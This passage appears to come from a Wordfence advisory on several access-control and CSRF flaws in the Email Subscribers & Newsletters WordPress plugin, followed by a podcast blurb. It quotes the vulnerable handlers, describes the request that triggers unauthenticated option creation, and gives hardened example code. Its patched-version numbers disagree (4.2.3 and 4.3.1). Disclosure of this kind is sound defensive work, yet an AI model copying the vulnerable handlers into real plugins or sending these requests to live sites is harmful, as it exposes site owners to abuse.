		if ( 'submitted' === $submitted && 'ig-es-save-admin-settings' === $submit_action ) {
			// $nonce is read above but never passed to wp_verify_nonce() before the save.
			$options = ig_es_get_post_data('', '', false);
			$options = apply_filters( 'ig_es_before_save_settings', $options );

The settings form that generates and submits the nonce:

                <div class="content save">
                    <input type="hidden" name="submitted" value="submitted"/>
                    <input type="hidden" name="submit_action" value="ig-es-save-admin-settings"/>
					<?php $nonce = wp_create_nonce( 'es-update-settings' ); ?>

                    <input type="hidden" name="update-settings" id="ig-update-settings" value="<?php echo $nonce; ?>"/>
					<?php submit_button(); ?>
                </div>

Send Test Emails from the Administrative Dashboard as an Authenticated User [Subscriber+]

Description: Send Test Emails as Subscriber+
CVSS v3.0 Score: 4.3 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3

As previously mentioned, Email Subscribers & Newsletter provides site owners the ability to create “campaigns” that will be sent out via email. Part of the plugin functionality includes an option in the settings dashboard to send test emails in order to verify that a site’s mail function and email integration is working properly. Unfortunately, there was a flaw in this plugin that allowed authenticated users with subscriber and above access the ability to send test emails on behalf of the site owner. Although this is a less severe vulnerability, it still has the potential to be used for harm, as an attacker could send out unwanted emails from a site owner’s email server.

Vulnerability in Detail

In order to send test emails, this plugin registers a wp_ajax function to send_test_email. By default, AJAX actions can be triggered by any authenticated WordPress user sending a request from the wp-admin dashboard. For more sensitive functions, plugin developers should include a permissions or capability check to verify that the AJAX request is coming from a user with the appropriate capabilities to perform that action. With this plugin, we saw that there were no access control checks to verify that the request was coming from an authenticated administrative user, allowing lower level authenticated users to send test emails on behalf of the site owner.

 		add_action( 'wp_ajax_send_test_email', array( $this, 'send_test_email' ) );
 	function send_test_email() {
		$message = array();
		$message = array(
			'status'  => 'ERROR',
			'message' => __( 'Something went wrong', 'email-subscribers' )
		);
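As an added example (not the plugin’s code; the es_example_ names, the script handle and the nonce action are invented), here is the shape of a test-email AJAX handler that verifies a nonce and a capability before sending anything. The nonce is passed to the admin script with wp_localize_script() so the browser can include it in the request, and only the logged-in wp_ajax_ hook is registered.

```php
<?php
// Added example (not the plugin's code): an AJAX test-email action that
// checks a nonce and the manage_options capability before calling wp_mail().

// Hand the admin script the AJAX URL and a nonce bound to this action.
function es_example_enqueue_test_email_script() {
    wp_enqueue_script( 'es-example-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'es-example-admin', 'esExample', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'es_example_send_test_email' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'es_example_enqueue_test_email_script' );

// Only the logged-in hook is registered, never wp_ajax_nopriv_.
add_action( 'wp_ajax_es_example_send_test_email', 'es_example_send_test_email' );

function es_example_send_test_email() {
    // A logged-in session alone is not enough: any authenticated user can
    // reach admin-ajax.php. Verify the nonce, then the capability.
    check_ajax_referer( 'es_example_send_test_email', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => __( 'Not allowed.', 'email-subscribers' ) ), 403 );
    }

    // Validate the recipient so the site cannot be used to mail arbitrary strings.
    $to = isset( $_POST['email'] ) ? sanitize_email( wp_unslash( $_POST['email'] ) ) : '';
    if ( ! is_email( $to ) ) {
        wp_send_json_error( array( 'message' => __( 'Invalid email address.', 'email-subscribers' ) ), 400 );
    }

    $sent = wp_mail(
        $to,
        __( 'Test email', 'email-subscribers' ),
        __( 'This is a test message from your site.', 'email-subscribers' )
    );
    if ( ! $sent ) {
        wp_send_json_error( array( 'message' => __( 'Something went wrong', 'email-subscribers' ) ) );
    }
    wp_send_json_success( array( 'message' => __( 'Test email sent.', 'email-subscribers' ) ) );
}
```

The browser side posts action=es_example_send_test_email together with the nonce and email fields to esExample.ajaxUrl; check_ajax_referer() ends the request with a 403 response if the nonce is missing or stale, and wp_send_json_error() ends it for the capability and validation failures, so wp_mail() is only ever reached by an administrator with a fresh nonce and a well-formed address.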

Unauthenticated Option Creation

Description: Unauthenticated Option Creation
CVSS v3.0 Score: 6.4 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3

Email Subscribers & Newsletters has an on-boarding process that can be skipped after the plugin is activated. When the on-boarding process is skipped, it creates a new option in the database and saves the value as “yes.” Unfortunately, there was no access control for this feature, so any unauthenticated user had the capability to create this option in the database, with any value appended to its name. This option value could later be modified with malicious code in conjunction with the CSRF vulnerability, though we were unable to exploit this by executing any code in this value, making this a much less severe issue.

Vulnerability in Detail

This function used an admin_init action to create the new option. This type of action typically runs when a user accesses the admin area of a site; however, it also runs on admin-ajax.php and admin-post.php. Therefore, if no access controls are in place, unauthenticated users have the ability to initiate the function by sending a request to admin-post.php or admin-ajax.php. This plugin used admin_init with no access controls; therefore, any user had the ability to create a new option with the name ig_es_ob_skip_[option_name], with [option_name] being any value input in the option_name parameter when sending the request. This option would be created with the default value of yes, which could later be changed using the CSRF vulnerability. All an attacker needed to do to exploit this vulnerability was to send a request to admin-ajax.php or admin-post.php with the es_skip parameter set to 1 and the option_name parameter set to the desired value.

	// Hooked to admin_init, which also fires for unauthenticated requests to
	// admin-ajax.php and admin-post.php.
	add_action( 'admin_init', array( $this, 'es_save_onboarding_skip' ) );

	// Save the "skip signup" option. Note: no capability check and no nonce check.
	function es_save_onboarding_skip() {

		$es_skip     = ig_es_get_request_data( 'es_skip' );
		$option_name = ig_es_get_request_data( 'option_name' );

		// The request-supplied suffix is concatenated straight into the option name.
		if ( $es_skip == '1' && ! empty( $option_name ) ) {
			update_option( 'ig_es_ob_skip_' . $option_name, 'yes' );
			$referer = wp_get_referer();
			wp_safe_redirect( $referer );
			exit();
		}
	}
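The following is an added example of how a handler hooked to admin_init should be guarded; it is not the plugin’s own patch. It assumes it runs inside WordPress as plugin code. The function and constant names, the nonce action name ig_es_skip_onboarding, the nonce field name _ig_es_nonce, and the allow-list of on-boarding step names (signup, import, settings) are assumptions for illustration and are not taken from the plugin. The audit helper at the end lists ig_es_ob_skip_* options whose suffix is not one of the expected step names, which on a site that ran a vulnerable version is a sign the unauthenticated endpoint was hit.

```php
<?php
/**
 * Hardened replacement for the on-boarding skip handler (added example, not the
 * plugin's patch). Assumes WordPress is loaded. Step names, nonce action and
 * nonce field name are assumed values.
 */

// Allow-list of on-boarding steps that may be skipped (assumed names).
const IG_ES_ONBOARDING_STEPS = array( 'signup', 'import', 'settings' );

// Build the "skip" link so that the request carries a nonce bound to this action.
function ig_es_skip_nonce_url( $url, $step ) {
	$url = add_query_arg( array( 'es_skip' => '1', 'option_name' => $step ), $url );
	return wp_nonce_url( $url, 'ig_es_skip_onboarding', '_ig_es_nonce' );
}

function ig_es_save_onboarding_skip_hardened() {
	// Cheap pre-check: admin_init fires on every admin-ajax.php / admin-post.php
	// request, so bail early unless this is actually a skip request.
	if ( ! isset( $_REQUEST['es_skip'] ) || '1' !== $_REQUEST['es_skip'] ) {
		return;
	}

	// 1. Authorization: admin_init does not imply a logged-in user, let alone an
	//    administrator, so the capability check has to be explicit.
	if ( ! current_user_can( 'manage_options' ) ) {
		return;
	}

	// 2. CSRF: require a nonce bound to this specific action. check_admin_referer()
	//    calls wp_die() on failure, so nothing below runs for a forged request.
	check_admin_referer( 'ig_es_skip_onboarding', '_ig_es_nonce' );

	// 3. Input validation: the suffix is request-controlled, so constrain it to
	//    known step names instead of concatenating it into the option name.
	$option_name = isset( $_REQUEST['option_name'] )
		? sanitize_key( wp_unslash( $_REQUEST['option_name'] ) )
		: '';
	if ( ! in_array( $option_name, IG_ES_ONBOARDING_STEPS, true ) ) {
		return;
	}

	// Third argument false: no need to autoload a one-off on-boarding flag.
	update_option( 'ig_es_ob_skip_' . $option_name, 'yes', false );

	// wp_safe_redirect() only follows same-host targets; fall back to the dashboard.
	$referer = wp_get_referer();
	wp_safe_redirect( $referer ? $referer : admin_url() );
	exit;
}
add_action( 'admin_init', 'ig_es_save_onboarding_skip_hardened' );

/**
 * Audit helper: return ig_es_ob_skip_* option names whose suffix is not an
 * expected step. Unexpected rows indicate the unauthenticated endpoint was used.
 */
function ig_es_find_unexpected_skip_options() {
	global $wpdb;
	$prefix = 'ig_es_ob_skip_';
	$rows   = $wpdb->get_col(
		$wpdb->prepare(
			"SELECT option_name FROM {$wpdb->options} WHERE option_name LIKE %s",
			$wpdb->esc_like( $prefix ) . '%'
		)
	);
	$unexpected = array();
	foreach ( $rows as $name ) {
		$suffix = substr( $name, strlen( $prefix ) );
		if ( ! in_array( $suffix, IG_ES_ONBOARDING_STEPS, true ) ) {
			$unexpected[] = $name;
		}
	}
	return $unexpected;
}
```

The order of the checks matters: the capability check runs before the nonce check, so an unauthenticated request is dropped silently rather than answered with a wp_die() page, and the allow-list runs last so that only an authorized, nonce-bearing request can influence which option is written.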

Disclosure Timeline

October 14th, 2019 – Developers notified privately of security issues.
October 14th, 2019 – Firewall rules released to Wordfence Premium users.
October 17th, 2019 – Developers acknowledged issues and released patches.
October 17th, 2019 – Developers notified that one of the patches was insufficient.
October 23rd, 2019 – Developers released another patch, which was sufficient but needed further security controls. Developers were notified.
November 13th, 2019 – Final Patch is released.
November 14th, 2019 – Free users receive firewall rule to protect against this vulnerability.

Conclusion

In today’s post, we detailed several security flaws present in the Email Subscribers & Newsletters plugin. These flaws have been patched in version 4.3.1 and we recommend that users update to the latest version available immediately. Sites running Wordfence Premium have been protected from attacks against most of these vulnerabilities since October 14th, 2019. Sites running the free version of Wordfence will receive the firewall rule update on November 14th, 2019.

The post Multiple Vulnerabilities Patched in Email Subscribers & Newsletters Plugin appeared first on Wordfence.


Podcast Episode 54: The Hacker Mindset at WordCamp US

Kathy Zant gave a presentation about The Hacker Mindset at WordCamp US 2019 in St. Louis. Learning to think like a hacker in the security realm is a big part of keeping your assets safe, and there are additional benefits. Kathy illustrates how the hacker mindset is much more than protecting your site. Thinking like a hacker can also help you break through perceived limitations, overcome obstacles, and capitalize on opportunities to innovate.

The post Podcast Episode 54: The Hacker Mindset at WordCamp US appeared first on Wordfence.
